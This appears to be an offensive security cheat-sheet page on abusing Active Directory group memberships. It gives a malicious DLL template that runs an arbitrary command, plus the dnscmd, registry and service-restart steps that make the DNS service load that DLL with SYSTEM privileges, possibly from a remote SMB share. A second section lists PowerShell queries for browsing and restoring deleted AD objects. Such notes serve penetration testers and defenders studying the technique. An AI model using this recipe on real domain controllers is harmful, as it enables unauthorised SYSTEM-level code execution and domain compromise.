AD

Table of content

Interesting groups

DNS Admin

Users in this group can load a DLL in the dns service. Once the dns service is reloaded, it will execute the DLL with SYSTEM privileges.

DLL squeleton

#include <stdio.h>
#include <stdlib.h>

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
        case DLL_PROCESS_ATTACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

extern "C" __declspec(dllexport)
DWORD WINAPI DnsPluginInitialize( PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction){
    system(${command})
}

extern "C" __declspec(dllexport)
DWORD WINAPI DnsPluginCleanup(){
    return ERROR_SUCCESS;
}

extern "C" __declspec(dllexport)
DWORD WINAPI DnsPluginQuery(PSTR pszQueryName, DWORD wQueryType, PSTR pszRecordOwnerName, PVOID ppDnsRecordListHead){
    return ERROR_SUCCESS;
}

Steps

  1. Load the malicious DLL:
    dnscmd ${ip} /config /serverlevelplugindll ${dllLocation}
    The ip is the ip of the DNS where the DLL must be load. It can be 127.0.0.1 if executed directly on the target machine.

The dllLocation is the path to the malicious DLL. It can be an SMB path (\\10.10.10.10\Share\malicious.dll)

  1. Verify the DLL has been loaded:

    Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

  2. Restart the service

    sc.exe stop dns && sc.exe start dns

AD Recycle Bin

Users in the group can browse the AD Recycle Bin that contains the deleted elements.

# List all deleted AD users
Get-ADObject -Filter {isDeleted -eq $true} -IncludeDeletedObjects -Properties *

# Query a specific deleted user called Ben by SamAccountName
Get-ADObject -Filter {SamAccountName -eq ${samAccountName}} -IncludeDeletedObjects -Properties *

# Query a specific deleted user if we know the SID
Get-ADObject -Filter {objectSid -eq "${SID}"} -IncludeDeletedObjects -Properties *

# Restore the deleted AD user from the Active Directory Recycle Bin
Get-ADObject -Filter {UserPrincipalName -eq "${userPrincipalName}"} -IncludeDeletedObjects -Properties * | Restore-ADObject

results matching ""

    No results matching ""

    results matching ""

      No results matching ""